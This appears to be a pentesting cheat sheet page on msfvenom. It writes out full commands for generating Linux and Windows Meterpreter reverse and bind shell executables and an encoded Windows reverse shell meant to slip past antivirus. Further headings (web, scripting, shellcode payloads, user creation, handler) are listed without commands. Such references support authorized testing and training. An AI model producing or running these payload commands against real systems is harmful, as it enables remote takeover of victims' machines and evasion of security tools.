π’MSFVenom
List Payloads
msfvenom -lBinaries Payloads
Linux Meterpreter Reverse Shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elfLinux Bind Meterpreter Shell
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elfLinux Bind Shell
msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elfWindows Meterpreter Reverse TCP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exeWindows Reverse TCP Shell
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exeWindows Encoded Meterpreter Windows Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exeWeb Payloads
PHP Meterpreter Reverse TCP
ASP Meterpreter Reverse TCP
JSP Java Meterpreter Reverse TCP
WAR
Scripting Payloads
Python Reverse Shell
Bash Unix Reverse Shell
Perl Unix Reverse shell
Shellcode
Windows Meterpreter Reverse TCP Shellcode
Linux Meterpreter Reverse TCP Shellcode
POP Calulator
Create User
Metasploit Handler
Last updated
Was this helpful?